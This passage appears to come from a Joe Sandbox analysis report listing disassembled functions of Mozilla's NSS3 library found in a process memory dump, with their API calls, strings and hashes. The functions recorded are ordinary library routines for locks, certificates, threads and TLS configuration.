PL_FinishArenaPool.NSS3(?), ref: 6C56A0CF
PR_CallOnce.NSS3(6C6A2AA4,6C5A12D0), ref: 6C56A12E
PL_FreeArenaPool.NSS3(?), ref: 6C56A140
PL_FinishArenaPool.NSS3(?), ref: 6C56A148
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C56A158
PL_FinishArenaPool.NSS3(?), ref: 6C56A175
CERT_AddCertToListTail.NSS3(00000000,00000000), ref: 6C56A1A5
CERT_DestroyCertificate.NSS3(00000000), ref: 6C56A1B2
free.MOZGLUE(00000000), ref: 6C56A1C6
CERT_DestroyCertList.NSS3(00000000), ref: 6C56A1D6

Part of subcall function 6C5855E0: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,6C55EAC5,00000001,?,6C55CE9B,00000001,6C55EAC5,00000003,-00000004,00000000,?,6C55EAC5), ref: 6C585627
Part of subcall function 6C5855E0: PR_CallOnce.NSS3(6C6A2AA4,6C5A12D0,?,?,?,?,?,?,?,?,?,?,6C55EAC5,00000001,?,6C55CE9B), ref: 6C58564F
Part of subcall function 6C5855E0: PL_FreeArenaPool.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C55EAC5,00000001), ref: 6C585661
Part of subcall function 6C5855E0: PR_SetError.NSS3(FFFFE01A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C55EAC5), ref: 6C5856AF

Strings

security, xrefs: 6C56A00F

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Arena$Pool$CallFreeOnce$CertErrorFinishList$CriticalDestroyEnterInitSectionUnlockUtilValue$Alloc_Arena_CertificateTailfree
String ID: security
API String ID: 3250630715-3315324353
Opcode ID: d4da3c4d965cdb4ae8ed874ed8773e76183668fcdffdd31348e31330fdf18a67
Instruction ID: 47d08df352ba5610032993aef295f47afc4cbcfd7b7812a172bea4a844a6b2d8
Opcode Fuzzy Hash: d4da3c4d965cdb4ae8ed874ed8773e76183668fcdffdd31348e31330fdf18a67
Instruction Fuzzy Hash: 3551F875E00219ABEB00DBA7DC84FAE7374AF8170CF104524E915AAF61E731DD49C7A2

Function 6C584C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C584C4C
EnterCriticalSection.KERNEL32(?), ref: 6C584C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C584CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C584CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C584CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C584D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C584D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C584DB7

Part of subcall function 6C5EDD70: TlsGetValue.KERNEL32 ref: 6C5EDD8C
Part of subcall function 6C5EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5EDDB4

Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307AD
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307CD
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307D6
Part of subcall function 6C5307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4C204A), ref: 6C5307E4
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,6C4C204A), ref: 6C530864
Part of subcall function 6C5307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C530880
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,6C4C204A), ref: 6C5308CB
Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(?,?,6C4C204A), ref: 6C5308D7
Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(?,?,6C4C204A), ref: 6C5308FB

TlsGetValue.KERNEL32 ref: 6C584DD7
EnterCriticalSection.KERNEL32(?), ref: 6C584DEC
PR_Unlock.NSS3(?), ref: 6C584E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C584E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C584E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C584E71
free.MOZGLUE(00000000), ref: 6C584E7A
PR_Unlock.NSS3(?), ref: 6C584EA2
TlsGetValue.KERNEL32 ref: 6C584EC1
EnterCriticalSection.KERNEL32(?), ref: 6C584ED6
PR_Unlock.NSS3(?), ref: 6C584F01
free.MOZGLUE(00000000), ref: 6C584F2A

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 3ce7da8bd8cb398b6ee30e619ba85a3b58c3cecc97b3d1693ac1c2c290e06c15
Instruction ID: 564b942b51a1e2281ad311f4ce5bc1c15ef5f51e78c911016451740756c3f23e
Opcode Fuzzy Hash: 3ce7da8bd8cb398b6ee30e619ba85a3b58c3cecc97b3d1693ac1c2c290e06c15
Instruction Fuzzy Hash: C8B11471A01216DFDB00EF69DC94BAA77B8BF49318F044129EC1597B01EB30E964CBE2

Function 6C58FFB0 Relevance: 30.1, APIs: 20, Instructions: 68COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(?,?,6C5876C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C58FFB4

Part of subcall function 6C6098D0: calloc.MOZGLUE(00000001,00000084,6C530936,00000001,?,6C53102C), ref: 6C6098E5

PR_NewLock.NSS3(?,?,6C5876C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C58FFC6

Part of subcall function 6C6098D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C609946
Part of subcall function 6C6098D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C4C16B7,00000000), ref: 6C60994E
Part of subcall function 6C6098D0: free.MOZGLUE(00000000), ref: 6C60995E

PR_NewLock.NSS3(?,?,6C5876C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C58FFD6
PR_NewLock.NSS3(?,?,6C5876C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C58FFE6
PR_NewLock.NSS3(?,?,6C5876C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C58FFF6
PR_NewLock.NSS3(?,?,6C5876C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C590006
PR_NewLock.NSS3(?,?,6C5876C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C590016
PR_NewLock.NSS3(?,?,6C5876C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C590026
PR_NewLock.NSS3(?,?,6C5876C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C590036
PR_NewLock.NSS3(?,?,6C5876C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C590046
PR_NewLock.NSS3(?,?,6C5876C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C590056
PR_NewLock.NSS3(?,?,6C5876C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C590066
PR_NewLock.NSS3(?,?,6C5876C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C590076
PR_NewLock.NSS3(?,?,6C5876C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C590086
PR_NewLock.NSS3(?,?,6C5876C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C590096
PR_NewLock.NSS3(?,?,6C5876C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C5900A6
PR_NewLock.NSS3(?,?,6C5876C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C5900B6
PR_NewLock.NSS3(?,?,6C5876C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C5900C6
PR_NewLock.NSS3(?,?,6C5876C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C5900D6
PR_NewLock.NSS3(?,?,6C5876C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5575C2,00000000), ref: 6C5900E6

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Lock$CountCriticalErrorInitializeLastSectionSpincallocfree
String ID:
API String ID: 1407103528-0
Opcode ID: 3f05b1edca22858f32627c8a30486d38f34673f5543226b220b8237ca6573352
Instruction ID: e872a49390d06ad18e669bfee8c336b2ccf88ef5875792b67d20f1d23213456c
Opcode Fuzzy Hash: 3f05b1edca22858f32627c8a30486d38f34673f5543226b220b8237ca6573352
Instruction Fuzzy Hash: E731FCF0F866149E8B49DFA7E28814D3BB5FB17A08F10591BD50C96B01D7B4214ACF9D

Function 6C5D6E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C5D6BF7), ref: 6C5D6EB6

Part of subcall function 6C531240: TlsGetValue.KERNEL32(00000040,?,6C53116C,NSPR_LOG_MODULES), ref: 6C531267
Part of subcall function 6C531240: EnterCriticalSection.KERNEL32(?,?,?,6C53116C,NSPR_LOG_MODULES), ref: 6C53127C
Part of subcall function 6C531240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C53116C,NSPR_LOG_MODULES), ref: 6C531291
Part of subcall function 6C531240: PR_Unlock.NSS3(?,?,?,?,6C53116C,NSPR_LOG_MODULES), ref: 6C5312A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C67FC0A,6C5D6BF7), ref: 6C5D6ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C5D6EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C5D6EFC
PR_NewLock.NSS3 ref: 6C5D6F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C5D6F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C5D6BF7), ref: 6C5D6F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C5D6BF7), ref: 6C5D6F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C5D6BF7), ref: 6C5D6FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C5D6BF7), ref: 6C5D6FFD

Strings

SSLKEYLOGFILE, xrefs: 6C5D6EB1
SSLFORCELOCKS, xrefs: 6C5D6F2B
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C5D6F4F
NSS_SSL_CBC_RANDOM_IV, xrefs: 6C5D6FF8
# SSL/TLS secrets log file, generated by NSS, xrefs: 6C5D6EF7
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C5D6FDB

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: f2976e5ef4ea0db7e702bf2f3f5a3654d12ab288078391cb2591fabcf06c392c
Instruction ID: e2e5725dda081e0525c26c89975292c7b489e8fe5a9ac16037420bf4852eca7e
Opcode Fuzzy Hash: f2976e5ef4ea0db7e702bf2f3f5a3654d12ab288078391cb2591fabcf06c392c
Instruction Fuzzy Hash: 0BA15973A56F8186E700967DDC4134836E1AB973A9F194BA9E832C7EDCDB31B440874E

Function 6C555DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C555DEC
PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C555E0F
PORT_ZAlloc_Util.NSS3(00000828), ref: 6C555E35
SECKEY_CopyPublicKey.NSS3(?), ref: 6C555E6A
HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6C555EC3
NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6C555ED9
SECKEY_SignatureLen.NSS3(?), ref: 6C555F09
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6C555F49
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C555F89
free.MOZGLUE(?), ref: 6C555FA0
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C555FB6
free.MOZGLUE(00000000), ref: 6C555FBF
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C55600C
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C556079
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C556084
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C556094

Strings

, xrefs: 6C555EEB

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
String ID:
API String ID: 2310191401-3916222277
Opcode ID: b8c70513800bc1449b05d06b3baf881fc1afd5903a13ba9d8cbee93975fdb676
Instruction ID: c727c29b173a52628416f37b8c17df3b08272a59e8624c4bb46fd8a1be91c8fc
Opcode Fuzzy Hash: b8c70513800bc1449b05d06b3baf881fc1afd5903a13ba9d8cbee93975fdb676
Instruction Fuzzy Hash: C781D3B1E002059BDF10CF64DC81BAE77B5AF44318F94456AE81AA7791EB32E924CBD1

Function 6C52B860 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 174COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000144,?,?,?,?,?,6C52B45E,?,?,?,?,?,?,?,?), ref: 6C52B87D
TlsGetValue.KERNEL32 ref: 6C52B8FE
EnterCriticalSection.KERNEL32(?), ref: 6C52B912
TlsGetValue.KERNEL32 ref: 6C52B959
_PR_MD_UNLOCK.NSS3(?), ref: 6C52B977
calloc.MOZGLUE(00000001,0000002C), ref: 6C52B983
PR_NewCondVar.NSS3 ref: 6C52B9B9
InitializeCriticalSectionAndSpinCount.KERNEL32(-00000040,000005DC,?,?), ref: 6C52BA54
GetLastError.KERNEL32 ref: 6C52BA5F
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C52BA77
DeleteCriticalSection.KERNEL32(?), ref: 6C52BA96
free.MOZGLUE(?), ref: 6C52BA9D
free.MOZGLUE(?), ref: 6C52BAB3
DeleteCriticalSection.KERNEL32(?), ref: 6C52BACD
free.MOZGLUE(00000000), ref: 6C52BAD4

Strings

X jl, xrefs: 6C52B93C
T jl, xrefs: 6C52BA0C

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalSection$free$DeleteErrorValuecalloc$CondCountEnterInitializeLastSpin
String ID: T jl$X jl
API String ID: 1841981668-3113417791
Opcode ID: 15df6e9b87061a2e240b36a2724f8e9a02032d0e2a71628a803b296c52df9050
Instruction ID: 727c92faa726f7508fc48effa8bde475827f22d4d219133e558f259d5917dfdd
Opcode Fuzzy Hash: 15df6e9b87061a2e240b36a2724f8e9a02032d0e2a71628a803b296c52df9050
Instruction Fuzzy Hash: 3F51ADB1A003029BEB10EF2ADC85B5A7BF4FF45308F148529E85BD7A81EB35E445CB95

Function 6C53F850 Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 262COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE004,00000000), ref: 6C53F86F

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

PR_smprintf.NSS3(%lu,?), ref: 6C53F899
PR_smprintf.NSS3(%s.%lu,00000000,?), ref: 6C53FA4E
PR_smprintf.NSS3(%s.%llu,00000000,00000000,00000000), ref: 6C53FAA2
PR_smprintf.NSS3(%s.UNSUPPORTED,00000000), ref: 6C53FAB6
free.MOZGLUE(00000000), ref: 6C53FAC1
PR_smprintf.NSS3(OID.UNSUPPORTED), ref: 6C53FAD3
__aulldiv.LIBCMT ref: 6C53FB00
PR_smprintf.NSS3(OID.%llu.%llu,00000000,?,00000000,FFFFFFD8,00000000,00000000,00000028,00000000), ref: 6C53FB4B

Strings

OID.%llu.%llu, xrefs: 6C53FB46
OID.%lu.%lu, xrefs: 6C53FA7D
%s.UNSUPPORTED, xrefs: 6C53FAB1
OID.UNSUPPORTED, xrefs: 6C53FACE
%s.%lu, xrefs: 6C53FA49
%s.%llu, xrefs: 6C53FA9D

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: R_smprintf$ErrorValue__aulldivfree
String ID: %s.%llu$%s.%lu$%s.UNSUPPORTED$OID.%llu.%llu$OID.%lu.%lu$OID.UNSUPPORTED
API String ID: 2145857551-3523515424
Opcode ID: 8e5d0d4cf45a80a1df3394f2b31a5b34a395faaa1af28633003c2a93d0d6aa45
Instruction ID: 5edb05dd5d8dbf14c0442fb612cd9c242896b524b2a54eba720d4fd70b895898
Opcode Fuzzy Hash: 8e5d0d4cf45a80a1df3394f2b31a5b34a395faaa1af28633003c2a93d0d6aa45
Instruction Fuzzy Hash: 91814972F110314AEF088B6D8C5577EBBA2DBC6304F1847A9E869DBB85F670C80587B5

Function 6C659C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000080), ref: 6C659C70
PR_NewLock.NSS3 ref: 6C659C85

Part of subcall function 6C6098D0: calloc.MOZGLUE(00000001,00000084,6C530936,00000001,?,6C53102C), ref: 6C6098E5

PR_NewCondVar.NSS3(00000000), ref: 6C659C96

Part of subcall function 6C52BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C5321BC), ref: 6C52BB8C

PR_NewLock.NSS3 ref: 6C659CA9

Part of subcall function 6C6098D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C609946
Part of subcall function 6C6098D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C4C16B7,00000000), ref: 6C60994E
Part of subcall function 6C6098D0: free.MOZGLUE(00000000), ref: 6C60995E

PR_NewLock.NSS3 ref: 6C659CB9
PR_NewLock.NSS3 ref: 6C659CC9
PR_NewCondVar.NSS3(00000000), ref: 6C659CDA

Part of subcall function 6C52BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C52BBEB
Part of subcall function 6C52BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C52BBFB
Part of subcall function 6C52BB80: GetLastError.KERNEL32 ref: 6C52BC03
Part of subcall function 6C52BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C52BC19
Part of subcall function 6C52BB80: free.MOZGLUE(00000000), ref: 6C52BC22

PR_NewCondVar.NSS3(?), ref: 6C659CF0
PR_NewPollableEvent.NSS3 ref: 6C659D03

Part of subcall function 6C64F3B0: PR_CallOnce.NSS3(6C6A14B0,6C64F510), ref: 6C64F3E6
Part of subcall function 6C64F3B0: PR_CreateIOLayerStub.NSS3(6C6A006C), ref: 6C64F402
Part of subcall function 6C64F3B0: PR_Malloc.NSS3(00000004), ref: 6C64F416
Part of subcall function 6C64F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6C64F42D
Part of subcall function 6C64F3B0: PR_SetSocketOption.NSS3(?), ref: 6C64F455
Part of subcall function 6C64F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6C64F473

Part of subcall function 6C609890: TlsGetValue.KERNEL32(?,?,?,6C6097EB), ref: 6C60989E

EnterCriticalSection.KERNEL32(?), ref: 6C659D78
calloc.MOZGLUE(00000001,0000000C), ref: 6C659DAF
_PR_CreateThread.NSS3(00000000,6C659EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6C659D9F

Part of subcall function 6C52B3C0: TlsGetValue.KERNEL32 ref: 6C52B403
Part of subcall function 6C52B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C52B459

_PR_CreateThread.NSS3(00000000,6C65A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6C659DE8
calloc.MOZGLUE(00000001,0000000C), ref: 6C659DFC
_PR_CreateThread.NSS3(00000000,6C65A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6C659E29
calloc.MOZGLUE(00000001,0000000C), ref: 6C659E3D
_PR_MD_UNLOCK.NSS3(?), ref: 6C659E71
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C659E89

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
String ID:
API String ID: 4254102231-0
Opcode ID: 44f3d2079d08367ee9e6226a7f8935128edcc4c74f35fdbc658be2e924092846
Instruction ID: dfa946c7e877291d08fd522eba1635ef3a51cd3e50638ee26a54e11ddafe2732
Opcode Fuzzy Hash: 44f3d2079d08367ee9e6226a7f8935128edcc4c74f35fdbc658be2e924092846
Instruction Fuzzy Hash: 9D616EB1A00706AFD714DF75C844A67BBE8FF49308B14452AE80AC7B51E730E825CBA9

Function 6C553FF0 Relevance: 27.2, APIs: 18, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

SECKEY_CopyPublicKey.NSS3(?), ref: 6C554014

Part of subcall function 6C5539F0: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C555E6F,?), ref: 6C553A08
Part of subcall function 6C5539F0: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C555E6F), ref: 6C553A1C
